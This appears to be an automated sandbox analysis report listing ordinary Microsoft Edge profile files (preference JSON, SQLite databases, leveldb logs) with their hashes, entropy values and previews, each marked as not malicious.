                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c839f359-e095-491b-901b-7eb8a85f6eb2.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):14623
                                                                                                                                                                                                                                                                                Entropy (8bit):5.2606308601257705
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:sVrJ9pQTryZiuaba4uypPJ5Kw4rNaI0lY7gN128Kpj+FbFr1Qw/3Yoz1f:sVrLAJu4PJ5KiIjfpU/Qwg8
                                                                                                                                                                                                                                                                                MD5:522E9AF8EAF178D672AADD8C15178766
                                                                                                                                                                                                                                                                                SHA1:181F284FE4A4CD6787F695B10ACEE32DF5EA8233
                                                                                                                                                                                                                                                                                SHA-256:A4CFDD9F7E675301626FF1B6795894E6A7EFBAE408AC3179EF7034E86FBCE97A
                                                                                                                                                                                                                                                                                SHA-512:232E677EC6BEB93DC6BF64AEB63D76FF989C7F06F8C7E5934E2C0CE84DE0EA82E194192DECFDE848DA287371708AE47B20F90E5FD92650F35DEC0D90974482B0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951549506799","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\dd67b07c-39cd-40fa-b9f0-3a36c3cd6820.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e64f8e02-8d31-4cab-8bfe-665c9ff80940.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):24853
                                                                                                                                                                                                                                                                                Entropy (8bit):5.565515102457312
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:8DVLB6WPUGfET8F1+UoAYDCx9Tuqh0VfUC9xbog/OVvaD5brwCLIhpZtuu6W:8DVLB6WPUGfETu1jaSi5wCgtn
                                                                                                                                                                                                                                                                                MD5:5B47B81C6BE388AB24252E0FF382EAA0
                                                                                                                                                                                                                                                                                SHA1:506CD37EE86E7C31A7D9B455F34EC3F7ADBF8BFB
                                                                                                                                                                                                                                                                                SHA-256:8A846D7438134C886F16F3CF4D0055F9B36B8AC8F592F60E5C5CCC37E68E7126
                                                                                                                                                                                                                                                                                SHA-512:C92453086F32AC8C30F036E5B162C6F727764628B360233486C8537CAB37852507F46E88516F17DDC6746287D983B0983EAE8ECDDEA5C7E59F01C2778960A0DF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13385951548871166","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13385951548871166","location":5,"ma

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f963889c-7660-4297-8133-73e0c416db09.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                                                                                Entropy (8bit):0.35226517389931394
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
                                                                                                                                                                                                                                                                                MD5:D2CCDC36225684AAE8FA563AFEDB14E7
                                                                                                                                                                                                                                                                                SHA1:3759649035F23004A4C30A14C5F0B54191BEBF80
                                                                                                                                                                                                                                                                                SHA-256:080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
                                                                                                                                                                                                                                                                                SHA-512:1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                Entropy (8bit):0.09051672953810393
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:JCChFdDCChFdPFnnnnnnnnnnnnUbwEcG:JCG7DCG79nnnnnnnnnnnndvG
                                                                                                                                                                                                                                                                                MD5:B283093E09D4C70FE12AB22B430AC484
                                                                                                                                                                                                                                                                                SHA1:2C824497F3F092C7F91DF43A672646A8C785E5FF
                                                                                                                                                                                                                                                                                SHA-256:AF7E21E2132178F0BC6B171F8FFE4CA854E6A5E93473FA26C2C10834E5C6CFF5
                                                                                                                                                                                                                                                                                SHA-512:36A47A6E92CFE2BFF09F34FD62E1FB546EE9D210E2D6DDDD75BD926730E82DA252D5D8D49CC28AEB09134E4E684DB5328B385D4F9176D46BCEBA69BA76589072
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:..-.............@........u..~(..s..b~.....].;g...-.............@........u..~(..s..b~.....].;g.........<...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):263712
                                                                                                                                                                                                                                                                                Entropy (8bit):0.8821940564030462
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:j0mqwB2EewBveJwBXzfwBjaiwBRMZwBatlwBB7vwBIeHwBXsFwBwP8sfwB8MVZ8q:jxw6
                                                                                                                                                                                                                                                                                MD5:DAC1BB77CFAFA5CE3C0E5BFEE742ED44
                                                                                                                                                                                                                                                                                SHA1:BACCE82EA36B1EF26AF08C0E5B8267BE1D0F1560
                                                                                                                                                                                                                                                                                SHA-256:844F13BE14614CC4E4E6BE4BB4E053A8AB313AC55ADD2E00B748C992E21D0103
                                                                                                                                                                                                                                                                                SHA-512:94C745874212F5B19B55CDF2618568266774090B4852D95AFD7800BC25BF8EB75C4FEBAE0552B393693E05F679D477D2E876745E1D9856E94AF6731378919BA5
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:7....-...........s..b~....v..q...........s..b~.....,7>V.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000001.dbtmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):250
                                                                                                                                                                                                                                                                                Entropy (8bit):3.6968918782369986
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:VVXntjQPEnjQK7Tl3seGKT9rcQ6xFUyEOtlTxotlTxotlTxotlTxotlTxotlTxoX:/XntM+Z7Tl3sedhOudOuuuuuu
                                                                                                                                                                                                                                                                                MD5:2EC92AE4A28877E9A370BD0AE518040A
                                                                                                                                                                                                                                                                                SHA1:16823E00CA23E8E88A348798D83E522EB3357B89
                                                                                                                                                                                                                                                                                SHA-256:0143DFFBD462C771B6C8E35ECB11FEA4D237BF7140141A819DCDC36B24F13F8C
                                                                                                                                                                                                                                                                                SHA-512:3B68659832B336B847243A6337F60D0D909DD1B67FA629FE1B006F95783E44ADE84B2ADF4881564A7CFDBACD96D0E8E020A03426F907EDA33D9A52F279F4D8D1
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:A..r.................20_1_1...1.,U.................20_1_1...1.&.0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENT (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):281
                                                                                                                                                                                                                                                                                Entropy (8bit):5.182232275489818
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWveq1wkn23oH+Tcwtfrl2KLlNWSwL+q2Pwkn23oH+TcwtfrK+IFUv:7SSfYeb1LTwyvYfYeb23FUv
                                                                                                                                                                                                                                                                                MD5:3E1CFA0C9042F402B284D45702850CA3
                                                                                                                                                                                                                                                                                SHA1:D0CC35EF5E966390C4D1385BD6DB88C4DFE4B3CC
                                                                                                                                                                                                                                                                                SHA-256:23D93BE37978FA36C1BE8C03A8DBC8E22AF79549ED6F160FE971FDB548B73FB6
                                                                                                                                                                                                                                                                                SHA-512:D7D31DA0D35F14CED4B3F068DC22AAB5499F21B7321CCC6ECDF977420E6D1F3EB9B447AF0F3718DF256F4733F1D019AE7B921226EDAA372B0057153485F9FFF9
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:30.323 22a8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db since it was missing..2025/03/08-18:52:30.336 22a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000001.dbtmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):617
                                                                                                                                                                                                                                                                                Entropy (8bit):3.949047921959319
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:G0nYEQeeetU3p/Uz0RuWlJhC+lvBavRtin01zv0:G0nYEQR3RUovhC+lvBOL0
                                                                                                                                                                                                                                                                                MD5:EE5B47D224FE27A05467689F5B0678FA
                                                                                                                                                                                                                                                                                SHA1:35341CA4CC493FFC4939EB3D7D8E178D7D5028F9
                                                                                                                                                                                                                                                                                SHA-256:779E99DFF510FCAA7E0BBE155D9C33ABE7D6B82EEB40B91097E0E54499F06211
                                                                                                                                                                                                                                                                                SHA-512:CFD7F227195E51CC93DED600CDC5FDDD8689C924070F9F1E68CAD19EDB7937EACFBA00BA533A7592AA7664D749C756DA1A9A97EDD72EA6EF900782A968D944DE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.h.6.................__global... .t...................__global... ..'i..................21_.....B....................33_......-.t.................21_......'..................33_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.....

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):299
                                                                                                                                                                                                                                                                                Entropy (8bit):5.176173504313911
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWMZeq1wkn23oH+Tcwtfrzs52KLlNWYWdjL+q2Pwkn23oH+TcwtfrzAdIFUv:7hZSfYebs9LojyvYfYeb9FUv
                                                                                                                                                                                                                                                                                MD5:C6C564A31ACBD81B11895DA19B358343
                                                                                                                                                                                                                                                                                SHA1:3F5608984717EB7F49BBAACAF9D20B6D4C9BD9BA
                                                                                                                                                                                                                                                                                SHA-256:56C527025FA4684E2023368E36DA10B5AAB864EA9EEDEB3FA89ACD4102D170E0
                                                                                                                                                                                                                                                                                SHA-512:883DB6C2D1DAAC20C89DEA61519593A9469228D34C395BC915F29115C6F71DEBC6C8B459D8AC4418725D7169AC7E73460CB326CF57B1DF971E4FFC27A949B25C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:29.557 22a8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata since it was missing..2025/03/08-18:52:30.066 22a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
